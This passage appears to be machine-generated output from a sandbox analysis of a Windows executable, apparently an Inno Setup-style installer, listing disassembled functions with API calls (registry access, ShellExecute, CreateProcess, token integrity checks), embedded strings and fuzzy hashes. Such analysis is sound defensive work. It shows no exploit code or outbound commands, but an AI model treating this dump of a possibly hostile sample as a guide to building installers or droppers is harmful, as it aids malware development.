                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                            • API String ID: 1452528299-1392080489
                                                                                                                            • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                            • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                                            • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                            • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4283692357-0
                                                                                                                            • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                            • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                                            • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                            • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2227064392-0
                                                                                                                            • Opcode ID: e13c2d2b335e86ebcf447858ec8845d31b72a910f84188e90b50ee4c4f03f4e8
                                                                                                                            • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                                            • Opcode Fuzzy Hash: e13c2d2b335e86ebcf447858ec8845d31b72a910f84188e90b50ee4c4f03f4e8
                                                                                                                            • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 215268677-0
                                                                                                                            • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                            • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                                            • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                            • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetLastActivePopup.USER32(?), ref: 0042424C
• IsWindowVisible.USER32(?), ref: 0042425D
• IsWindowEnabled.USER32(?), ref: 00424267
• SetForegroundWindow.USER32(?), ref: 00424271
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Window$ActiveEnabledForegroundLastPopupVisible
• String ID:
• API String ID: 2280970139-0
• Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
• Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
• Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
• Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
Strings
• Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
• Failed to parse "reg" constant, xrefs: 0047A480
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Close
• String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
• API String ID: 3535843008-1938159461
• Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
• Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
• Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
• Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
• SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
Strings
• Will not restart Windows automatically., xrefs: 004836F6
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Window$ActiveForeground
• String ID: Will not restart Windows automatically.
• API String ID: 307657957-4169339592
• Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
• Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
• Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
• Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
Uniqueness
Uniqueness Score: -1.00%

APIs
• LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
• SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
Strings
• Extracting temporary file: , xrefs: 004763EC
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FileTime$Local
• String ID: Extracting temporary file:
• API String ID: 791338737-4171118009
• Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
• Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
• Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
• Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
Uniqueness
Uniqueness Score: -1.00%

Strings
• Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
• Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID:
• String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
• API String ID: 0-1974262853
• Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
• Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
• Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
• Instruction Fuzzy Hash: A331C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
Strings
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
• %s\%s_is1, xrefs: 00478F10
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
• Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
• Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
• Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
• Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
• Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
• Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
• Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
• Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                            • String ID: <
                                                                                                                            • API String ID: 893404051-4251816714
                                                                                                                            • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                            • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                                            • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                            • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                            • String ID: )
                                                                                                                            • API String ID: 2227675388-1084416617
                                                                                                                            • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                                            • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window
                                                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                                                            • API String ID: 2353593579-4169826103
                                                                                                                            • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                            • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                                            • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                            • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                                                            • API String ID: 3952431833-1023667238
                                                                                                                            • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                            • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                                            • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                            • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                                            • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                                              • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                            • String ID: 0nI
                                                                                                                            • API String ID: 3798668922-794067871
